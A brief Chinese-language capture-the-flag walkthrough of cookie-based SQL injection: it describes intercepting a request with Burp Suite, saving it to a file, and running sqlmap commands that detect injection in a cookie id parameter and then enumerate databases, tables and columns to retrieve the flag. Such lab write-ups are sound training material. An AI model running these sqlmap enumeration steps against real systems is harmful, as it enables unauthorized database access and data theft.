Cookie注入 sqlmap 设置代理,使用BurpSuite进行截断,并复制出Request信息,放置于txt文件中 使用 python sqlmap.py -r 123.txt --level=2 进行扫描 发现存在Cookie中id参数的注入漏洞 使用 python sqlmap.py -u "..." --dbs 爆出数据库名 python sqlmap.py -u "..." -D sqli -tables 爆出表名 python sqlmap.py -u "..." -D sqli -T pmawelsyuy --columns 爆出表结构 拿到flag